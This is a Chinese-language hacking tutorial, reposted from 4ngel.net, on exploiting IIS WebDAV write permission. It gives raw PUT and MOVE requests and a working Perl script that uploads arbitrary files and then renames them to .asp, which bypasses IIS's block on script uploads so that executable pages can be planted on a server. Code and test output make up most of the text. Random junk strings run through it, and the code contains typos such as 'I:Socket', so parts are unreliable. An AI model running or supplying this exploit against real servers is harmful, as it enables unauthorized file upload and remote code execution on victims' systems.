对iis写权限的利用

韩冰

作者：SuperHei 转自:http://www.4ngel.net

& `9 W1 P- E: r4 C

大家可能看过《远程分析IIS设置》，里面对iis的各种设置进行了分析，我这里就对iis的写权限来分析下，以下引用《远程分析IIS设置》文章对iis写权限分析内容：

$ b0 [5 O% U/ S1 H7 f+ T7 t) k. e

写权限

　　测试一个目录对于web用户是否具有写权限，采用如下方法：telnet到服务器的web端口(80)并发送一个如下请求：

% N9 h" Z6 t4 Q# b9 l9 m; ~

PUT /dir/my_file.txt HTTP/1.1 Host: iis-server Content-Length: 10

& u9 F# C' H- U, |

　　这时服务器会返回一个100( 继续)的信息：

0 R- C8 J! O0 V

1 ^# ?0 ^0 O5 j1 K) D$ [HTTP/1.1 100 Continue Server: Microsoft-IIS/5.0 * o+ T8 m" _/ B# \1 d0 I, D/ CDate: Thu, 28 Feb 2002 15:56:00 GMT

　　接着，我们输入10个字母：

AAAAAAAAAA

$ Z$ y, b" h2 p5 u

　　送出这个请求后，看服务器的返回信息，如果是一个 201 Created响应：

$ {9 b# _! M" z m0 ]* ^9 S

5 J7 \- x8 T! \; Q% y. jHTTP/1.1 201 Created 6 a5 G6 T; N, ^; ~Server: Microsoft-IIS/5.0 Date: Thu, 28 Feb 2002 15:56:08 GMT 3 S3 F# c ?& rLocation: http://iis-server/dir/my_file.txt Content-Length: 0 # _/ V1 i7 H6 M% c4 wAllow: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, COPY, MOVE, PROPFIND, PROPPATCH, SEARCH, LOCK, UNLOCK

9 Z8 _2 E" k6 r% d

　　那么就说明这个目录的写权限是开着的，反之，如果返回的是一个403错误，那么写权限就是没有开起来，如果需要你认证，并且返回一个 401(权限禁止) 的响应的话，说明是开了写权限，但是匿名用户不允许。如果一个目录同时开了”写”和“脚本和可执行程序”的话，那么web用户就可以上传一个程序并且执行它，恐怖哦%^#$!~

% j5 w4 |/ v x3 m

　　这里简单说明下：

1 w/ W/ R1 a8 hPUT /dir/my_file.txt HTTP/1.1 Host: iis-server Content-Length: 10

　　PUT：请求服务器将附件的实体储存在提供的请求URL处，如果该请求URL指向的资源已经存在，则附件实体应被看做是当前原始服务器上资源的修改版本。如果请求URL没有指向现存的资源，该URL将被该请求的用户代理定义成为一个新的资源，原始服务器将用该URL产生这个资源。 6 }3 ]6 `. V. n7 l: [2 }# `# r　　Host：是HTTP请求的发送地址 　　Content-Length：是内容长度，也就是实体长度，该长度值和上传的文件大小一致

　　用nc（telnet）提交很烦琐，我们这里写个简单的perl程序，来完成这个复杂的提交过程，在写代码时我们用binmode()方式打开文件，代码如下：

8 I0 m/ I4 p$ d& p

; v \# |# `: { : G: v5 k; V9 d6 a& W2 K" [1 J

#!/usr/bin/perl use I:Socket; $ARGC = @ARGV;

if ($ARGC != 4) { + t- d% }) H# E; T# R1 L8 P　　print "usage0 127.0.0.1 80 kaka.exe /Scripts/file.exe\n"; + x u+ b/ n! Y* {( U N　　exit; } $host = @ARGV[0]; ) w- ]! G4 a2 z6 |5 v/ [* V. d, R$port = @ARGV[1]; $file = @ARGV[2]; $path = @ARGV[3];

@s=stat("$file"); 1 @' v' \9 y! Z9 y$size = $s[7]; #得到文件大小 ; l, X8 ^' x# ^) V# T. a. T7 \print "$file size is $size bytes\n";

5 U$ i5 C9 m5 A5 t+ X

my $sock = I:Socket::INET->new(Proto =>"tcp", PeerAddr =>$host, % h4 g; _; c$ `" c0 ]2 p3 E# MPeerPort =>$port) || die "Sorry! Could not connect to $host \n"; : I7 r! y- i8 j0 pprint $sock "PUT $path HTTP/1.1\n"; print $sock "Host: $host\n"; T4 D! B9 ~. ?; eprint $sock "Content-Length: $size\n\n"; #sock连接

6 }( r% ^0 q4 `* @

open(FILE,"$file"); binmode(FILE); #用2进制打开文件

. g* E) [! h1 I$ F6 e& E

while (read(FILE,$char,1024)) { #读取文件数据上传 　　print $sock "$char"; } . d6 D% {9 ]1 o$ O# [8 Bprint $sock "\n\n"; @req = <$sock>; print "please wait...\n"; $ ]+ Q* j6 w0 {* u% Vsleep(2); if ($req[4]=~/200|201/){ 　　print "upfile Succeed!!!" ; #成功显示 ; Q$ a3 Q- u F} ' X' B) I4 @# C+ A' O+ Belse{ : X8 c- q2 G* r2 a7 V　　print "upfile faile!!!\n\n"; 　　print @req;#如果失败显示返回错误 } close $sock; 1 ?; H- A6 I6 b+ Lclose FILE;

　　下面我们测试下：

, J! ?- b" s/ q* I3 \# u S

C:\usr\bin>perl.exe iiswt.pl 127.0.0.1 80 kaka.txt /Scripts/kaka.txt % u. y9 A7 I3 z$ H4 Qkaka.txt size is 14 bytes 5 t- b5 d9 m* N( J% `; rplease wait... upfile Succeed!!!

) ]. z% ^ T9 N2 D0 J: c9 T L$ z

C:\Inetpub\Scripts>dir kaka.txt 6 O: Q) _0 X9 F l驱动器 C 中的卷没有标签。 卷的序列号是 3CD1-479E

C:\Inetpub\Scripts 的目录

1 ` D( B, J6 b0 r& a7 a

2004-05-05 00:37 14 kaka.txt 1 个文件 14 字节 . @1 s2 p+ S$ ]5 Y! l0 个目录 3,871,080,448 可用字节

5 j7 g+ I8 @: D* \' n7 y

　　这里我们把kaka.txt成功上传到了web目录Scripts下，以为程序中用了binmode()方式（2进制）打开文件，应该可以上传其他文件，我们先测试下exe文件：

4 ?8 j8 V( q0 |

8 u3 p6 }; \' L$ F9 v4 ?

C:\usr\bin>perl.exe iiswt.pl 127.0.0.1 80 perl.exe /Scripts/perl.exe perl.exe size is 20535 bytes - K, o w' F- g* X0 x5 T \4 ?please wait... upfile Succeed!!!

2 j6 r6 A& W3 P2 K: f: m

C:\Inetpub\Scripts>dir perl.exe " G$ n5 y2 f I% f9 m1 i驱动器 C 中的卷没有标签。 # r- Y0 z% ^/ A4 J6 R卷的序列号是 3CD1-479E

" S& Y/ O# L3 s

C:\Inetpub\Scripts 的目录

2004-05-05 00:42 20,535 perl.exe 1 个文件 20,535 字节 0 个目录 3,871,031,296 可用字节

　　成功，可以上传exe了，是不是可以上传任意文件呢？接着来测试asp文件：

+ q; p- _9 H4 V2 n4 f

C:\usr\bin>perl.exe iiswt.pl 127.0.0.1 80 kaka.asp /Scripts/kaka.asp " S7 O6 k% t) b& M8 L. `5 R: ?2 xkaka.asp size is 4 bytes please wait... , J$ N5 _6 u7 ~8 p# _1 Lupfile faile!!!

HTTP/1.1 100 Continue 4 l1 [# F0 i. Q$ a( n$ S% ?7 KServer: Microsoft-IIS/5.0 % S8 d. ?- S% eDate: Tue, 04 May 2004 16:45:51 GMT

% J D4 s, S7 e& o' M A0 ~- |5 A

HTTP/1.1 403 Forbidden l/ _) [0 z- M* ?& f, oServer: Microsoft-IIS/5.0 Date: Tue, 04 May 2004 16:45:51 GMT Connection: close & Q/ h& p2 [0 ?! LContent-Type: text/html 4 o3 ]5 s! u* L/ g5 dContent-Length: 44

<body><h2>HTTP/1.1 403 Forbidden</h2></body>

9 [5 W/ [( v( ^0 p/ M0 y

　　失败！！提示HTTP/1.1 403 Forbidden错误，看来直接用post方式写asp不行了，经过测试只要是iis支持的文件类型都会产生HTTP/1.1 403 Forbidden错误。

1 {; T8 X" M( D1 B! Q( A

　　那我们怎样才可以上传iis支持的文件类型文件呢？iis除了可以执行put，post，get等动作外，还可以执行COPY, MOVE等命令，呵呵！我们这可以先把本地asp上传到远程主机web目录下的txt等其他文件，在提过copy，move命令来改为asp。

　　我们还是先用nc提交测试下：

* B* { i' @3 r

5 w4 t% A6 e; y) U" P, n/ k! G( S |

D:\>nc 127.0.0.1 80 ) _) W) R/ l4 i5 a7 ^+ VMOVE /scripts/kaka.txt HTTP/1.1 4 ?5 o2 n5 x4 V2 d- w' p' [2 a* N7 tHost:127.0.0.1 * s9 s5 w5 Q' y$ v+ b' Q/ ^Destination: http://127.0.0.1/scripts/kaka.asp

( e$ z, p: n) R5 r; |) O$ X# \

HTTP/1.1 201 Created Server: Microsoft-IIS/5.0 Date: Sun, 05 Oct 2003 09:30:59 GMT 8 N7 L: E# a3 f, _) P- x& P; ]Location: http://127.0.0.1/scripts/x.asp Content-Type: text/xml Content-Length: 0

　　成功利用MOVE把/scripts/kaka.txt改名/scripts/kaka.asp。这样我们就可以结合put和move来完成通过iis写容易文件了。我们还是用perl来完成。

　　测试写asp成功：

8 P& P1 a+ k! G) w7 J % ^/ |9 B0 u+ k3 C3 h

C:\usr\bin>perl kaka.pl 127.0.0.1 80 kaka.asp /scripts/kaka.asp ************************************************************ codz by ≯SuperHei<QQ:123230273> && lanker<QQ:18779569> ************************************************************ kaka.asp size is 4 bytes 6 [) _( y! V/ s. yplease wait... upfile Succeed!!! Modifyfile Succeed!!!

　　最终的iiswrite.pl代码如下（由于写本文时，在网吧对于文章中代码是先又本人打“草稿”，又lanker测试并最终完成，THX lanker。）：

/ _0 D& s/ g# z" \) D + e0 V k9 r8 r# x& ?# F

#!/usr/bin/perl #The iiswrite Script

8 p4 T$ g5 Q$ M1 W" e' E2 I) B4 {

use I:Socket; 3 I0 y j/ @' C6 |% O9 Z% ]5 z$ARGC = @ARGV; $ D# O- f4 k; n9 W2 {print "*" x 60; print "\ncodz by ≯SuperHei<QQ:123230273> && lanker<QQ:18779569>\n"; print "*" x 60,"\n"; if ($ARGC != 4) { : `$ O' D7 W9 t　　print "usage0 127.0.0.1 80 kaka.txt /scripts/my_file.txt\n"; 　　exit; } ' U" M$ Y, |5 c1 k I) v$host = @ARGV[0]; $port = @ARGV[1]; $path = @ARGV[3]; : V2 `, l6 e! h+ {% d& ]( @( n5 r$file = @ARGV[2];

@path=split("/",$path); . G$ \6 N/ H: J# Y. | E/ n$any = pop(@path); * F$ Z& B. Y% W: g7 W* Y0 K$path1=join("/",@path); @s=stat("$file"); # N' d# W# D# J1 c$size = $s[7];

print "$file size is $size bytes\n"; 8 T5 d {! t- \3 e1 jmy $sock = I:Socket::INET->new(Proto =>"tcp", PeerAddr =>$host, PeerPort =>$port) || die "Sorry! Could not connect to $host \n"; print $sock "PUT $path1/lanker.txt HTTP/1.1\n"; print $sock "Host: $host\n"; print $sock "Content-Length: $size\n\n"; 4 h) h8 D6 ~7 _: @% ]# d* p2 Qopen(FILE,"$file")|| die "Can't open $file"; ; C1 u j4 g) q* t# z! ~binmode(FILE); : i; P5 J" @( m5 U( T a! Swhile (read(FILE,$char,1024)) { 　　print $sock "$char"; 1 F" i/ O9 i3 |* ]+ N! O} print $sock "\n\n"; @req = <$sock>; ! ]/ C2 D1 ]2 M1 p- Y: S: {7 dprint "please wait...\n"; sleep(2); ! S; h0 n2 z4 L) q0 l3 Rif ($req[4]=~/200|201/){ . T3 Y$ F2 R2 i: W* J( k! x5 u　　print "upfile Succeed!!!\n" ; + T8 u) V. n" e( L9 r) w} else{ 　　print "upfile faile!!!\n"; : x/ {0 B# z; K& q6 O1 H/ Z} 2 e% ], S1 B) L; @close $sock; 8 @6 `+ r9 z& _close FILE;

my $sock = I:Socket::INET->new(Proto =>"tcp", PeerAddr =>$host, 8 n* @ |( |# _3 E6 V+ DPeerPort =>$port) || die "Sorry! Could not connect to $host \n"; print $sock "MOVE $path1/lanker.txt HTTP/1.1\n"; + U6 P8 ?( S' X5 Gprint $sock "Host: $host\n"; ; m8 [, T, U( ]/ G. Y& lprint $sock "Destination:http://$hostport$path\n\n\n\n"; 8 l: J/ G% s3 q- K% N@req = <$sock>; if ($req[0]=~/20\d+|/){ 　　print "Modifyfile Succeed!!!" ; } else{ ( X5 d( t8 d3 A6 g" X. U& ~　　print "upfile faile!!!"; } 5 F( s7 l* V4 {4 n( Mclose $sock